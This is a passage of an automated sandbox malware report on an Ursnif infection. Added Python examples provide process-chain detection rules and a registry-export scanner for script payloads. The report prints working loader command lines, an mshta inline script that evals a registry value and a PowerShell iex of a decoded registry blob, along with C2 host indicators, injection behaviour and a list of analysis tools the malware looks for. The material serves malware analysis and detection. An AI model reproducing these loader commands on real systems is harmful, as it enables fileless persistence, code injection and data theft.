Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E61802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 21_2_05E61802
Source: explorer.exe, 0000001F.00000000.1201286212.000000000A9A0000.00000004.00000001.sdmp Binary or memory string: 63}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&\
Source: explorer.exe, 0000001F.00000000.1176071944.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.1193929316.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000018.00000003.1120112463.000002024752E000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
Source: explorer.exe, 0000001F.00000000.1176071944.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.1190265306.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000001F.00000000.1176375250.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000001F.00000000.1176375250.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: mshta.exe, 00000018.00000003.1120112463.000002024752E000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E51577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 21_2_05E51577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E414A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 21_2_05E414A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E56E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 21_2_05E56E4E

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB1A0A LoadLibraryA,GetProcAddress, 21_2_6FBB1A0A
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E62A09 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 21_2_05E62A09

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 188.127.235.42 80 Jump to behavior
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.0.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.0.cs Jump to dropped file
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: D40000 protect: page execute and read and write Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580 Jump to behavior
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7076312E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: D40000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7076312E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 816000 Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 816000 value: 00 Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4504 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP' Jump to behavior
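The process creations above form one chain: mshta.exe runs an inline HTA that RegRead's a value and evals it, that HTA starts powershell.exe which Get-ItemProperty's a byte value and iex's it, PowerShell has csc.exe compile sources under %TEMP%, WmiPrvSE.exe starts rundll32.exe on a .cpp-named module via DllRegisterServer, and that rundll32.exe starts control.exe -h as an injection target. Each link is a parent/child pair plus a command-line pattern that is cheap to express as a process-creation rule. The following Python is an added example, not part of the report: it encodes those links as rules and runs them over constructed Sysmon-style events whose command lines are copied from the report (with the single-quote rendering the report uses). The ProcEvent type, rule names and the benign control event are assumptions of the example.

```python
"""Detection rules for the mshta -> powershell -> csc / WmiPrvSE -> rundll32 -> control
chain, run over constructed process-creation events. Added example; not report output."""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # path of the parent process ("" when not recorded)
    image: str          # path of the created process
    command_line: str


def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


_RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+?)"?\s*,\s*DllRegisterServer', re.I)


def rundll32_module(cmd: str) -> Optional[str]:
    """Module path passed as 'rundll32 <module>,DllRegisterServer', or None."""
    m = _RUNDLL_RE.search(cmd)
    return m.group(1) if m else None


def _inline_hta_regread(e: ProcEvent) -> bool:
    c = e.command_line.lower()
    return _base(e.image) == "mshta.exe" and "about:<hta:application>" in c and "regread" in c


def _mshta_to_powershell_registry(e: ProcEvent) -> bool:
    # mshta launching powershell that reads a registry value and iex's it
    return (_base(e.parent_image) == "mshta.exe" and _base(e.image) == "powershell.exe"
            and re.search(r"\b(iex|invoke-expression)\b", e.command_line, re.I) is not None
            and re.search(r"\b(gp|get-itemproperty)\b.*HKCU:", e.command_line, re.I) is not None)


def _powershell_compiles_in_temp(e: ProcEvent) -> bool:
    return (_base(e.parent_image) == "powershell.exe" and _base(e.image) == "csc.exe"
            and re.search(r"\\appdata\\local\\temp\\", e.command_line, re.I) is not None)


def _wmiprvse_spawns_rundll32(e: ProcEvent) -> bool:
    return _base(e.parent_image) == "wmiprvse.exe" and _base(e.image) == "rundll32.exe"


def _rundll32_registers_non_dll(e: ProcEvent) -> bool:
    mod = rundll32_module(e.command_line) if _base(e.image) == "rundll32.exe" else None
    return mod is not None and not mod.lower().endswith(".dll")


def _rundll32_spawns_control(e: ProcEvent) -> bool:
    return _base(e.parent_image) == "rundll32.exe" and _base(e.image) == "control.exe"


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("mshta_inline_hta_regread", _inline_hta_regread),
    ("mshta_spawns_powershell_from_registry", _mshta_to_powershell_registry),
    ("powershell_compiles_csc_in_temp", _powershell_compiles_in_temp),
    ("wmiprvse_spawns_rundll32", _wmiprvse_spawns_rundll32),
    ("rundll32_dllregisterserver_non_dll", _rundll32_registers_non_dll),
    ("rundll32_spawns_control", _rundll32_spawns_control),
]


def evaluate(events: Iterable[ProcEvent]) -> List[Tuple[str, ProcEvent]]:
    """All (rule name, event) pairs that fire; one event may hit several rules."""
    return [(name, e) for e in events for name, pred in RULES if pred(e)]


SYS32 = r"C:\Windows\System32"
# Constructed events; command lines as rendered in the report. The mshta parent is
# not recorded there, so it is left empty.
SAMPLE_EVENTS = [
    ProcEvent("", SYS32 + r"\mshta.exe",
              r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';"
              r"resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software"
              r"\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'"),
    ProcEvent(SYS32 + r"\mshta.exe", SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII"
              r".GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    ProcEvent(SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline'"),
    ProcEvent(SYS32 + r"\wbem\WmiPrvSE.exe", SYS32 + r"\rundll32.exe",
              r"rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer"),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", SYS32 + r"\control.exe", r"C:\Windows\system32\control.exe -h"),
    ProcEvent(r"C:\Windows\explorer.exe", SYS32 + r"\notepad.exe", "notepad.exe"),   # benign control
]

if __name__ == "__main__":
    for name, ev in evaluate(SAMPLE_EVENTS):
        print(f"{name}: {_base(ev.parent_image) or '?'} -> {_base(ev.image)}")
```

The WmiPrvSE.exe parent is the part worth keeping even where the other rules are too noisy: a process created through Win32_Process.Create has WmiPrvSE.exe as its parent, which hides the real initiator from parent/child telemetry, and rundll32.exe under that parent with a non-.dll module is rare in normal operation.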
Source: explorer.exe, 0000001F.00000000.1185985554.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000001F.00000000.1176375250.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
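The mshta and powershell command lines in this section show where the payload lives: the HTA reads the DeviceFile value under HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 as a string and evals it, and PowerShell reads the UtilTool value as bytes, ASCII-decodes it and iex's the result. During response the practical step is to export that part of the user hive and scan every value for script content, since the values themselves are the persistence. The following Python is an added example, not part of the report: a parser for reg.exe export syntax (string, dword and hex:/hex(N): values, including hex data continued over lines) plus a scan that flags values containing script markers. The key path is the one from the report; the DeviceFile and UtilTool contents, the Counter and Run values and the marker list are constructed stand-ins, because the real value contents are not in the report.

```python
"""Parse a reg.exe export and flag values that hold script, as the chain in the
report parks its stages under HKCU\\Software\\AppDataLow. Added example with
constructed data; not part of the sandbox report."""
from __future__ import annotations
import re
from typing import Dict, List, Tuple, Union

RegValue = Union[str, bytes, int]

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')
_HEX_RE = re.compile(r"^hex(?:\([0-9a-fA-F]+\))?:(.*)$")   # hex:, hex(2):, hex(7): ...

# Substrings that mark script parked in a value (matched case-insensitively).
SCRIPT_MARKERS = ("iex", "invoke-expression", "frombase64string", "activexobject",
                  "wscript.shell", "regread", "<script", "eval(")


def _unescape(s: str) -> str:
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg_export(text: str) -> Dict[str, Dict[str, RegValue]]:
    """Key path -> {value name: str | bytes | int}. hex data that continues over
    lines ending in a backslash is reassembled before decoding."""
    keys: Dict[str, Dict[str, RegValue]] = {}
    key = None
    pending = None   # (value name, hex text so far) while a hex value spans lines
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:
            name, acc = pending
            acc += line.rstrip("\\")
            if line.endswith("\\"):
                pending = (name, acc)
            else:
                keys[key][name] = bytes.fromhex(acc.replace(",", ""))
                pending = None
            continue
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = _KEY_RE.match(line)
        if m:
            key = m.group(1)
            keys.setdefault(key, {})
            continue
        m = _VALUE_RE.match(line)
        if not m or key is None:
            continue        # skip lines we do not understand (e.g. a truncated export)
        name = _unescape(m.group(1)) if m.group(1) is not None else "(Default)"
        data = m.group(2)
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            keys[key][name] = _unescape(data[1:-1])
        elif data.startswith("dword:"):
            keys[key][name] = int(data[6:], 16)
        else:
            h = _HEX_RE.match(data)
            if h and h.group(1).endswith("\\"):
                pending = (name, h.group(1).rstrip("\\"))
            elif h:
                keys[key][name] = bytes.fromhex(h.group(1).replace(",", ""))
    return keys


def _as_text(v: RegValue) -> str:
    if isinstance(v, bytes):
        # ASCII stages decode as-is; UTF-16LE data (hex(2)/hex(7)) leaves a NUL
        # after every character, so NULs are dropped before matching.
        return v.decode("latin-1").replace("\x00", "")
    return v if isinstance(v, str) else ""


def find_script_payloads(keys: Dict[str, Dict[str, RegValue]],
                         markers=SCRIPT_MARKERS) -> List[Tuple[str, str, List[str]]]:
    """(key, value name, markers found) for every value that looks like script."""
    out = []
    for key, values in keys.items():
        for name, v in values.items():
            text = _as_text(v).lower()
            found = [mk for mk in markers if mk in text]
            if found:
                out.append((key, name, found))
    return out


def _reg_hex_lines(name: str, data: bytes, width: int = 16) -> str:
    """Render a REG_BINARY value in export syntax (continuation lines end in '\\')."""
    hx = [f"{b:02x}" for b in data]
    rows = [",".join(hx[i:i + width]) for i in range(0, len(hx), width)]
    return f'"{name}"=hex:' + ",\\\n  ".join(rows)


# Constructed stand-ins for the two stages; the real contents are not in the report.
STAGE2 = b"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($b)))"
URSNIF_KEY = r"HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550"
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00", "",
    f"[{URSNIF_KEY}]",
    r'"DeviceFile"="new ActiveXObject(\"WScript.Shell\").Run(\"powershell.exe\",0)"',
    _reg_hex_lines("UtilTool", STAGE2),
    '"Counter"=dword:00000003', "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"',
    "",
])

if __name__ == "__main__":
    for key, name, found in find_script_payloads(parse_reg_export(SAMPLE_REG)):
        print(f"{key}\\{name}: {', '.join(found)}")
```

reg.exe writes exports as UTF-16LE with a BOM, so read the file with that encoding before passing the text in; the marker list is a starting point and should be extended with whatever the decoded UtilTool stage on the host actually contains.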

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 21_2_6FBB11BF
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC6CD6 cpuid 21_2_04BC6CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB10ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 21_2_6FBB10ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC6CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 21_2_04BC6CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5E3F3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 21_2_05E5E3F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB1F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 21_2_6FBB1F7C

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif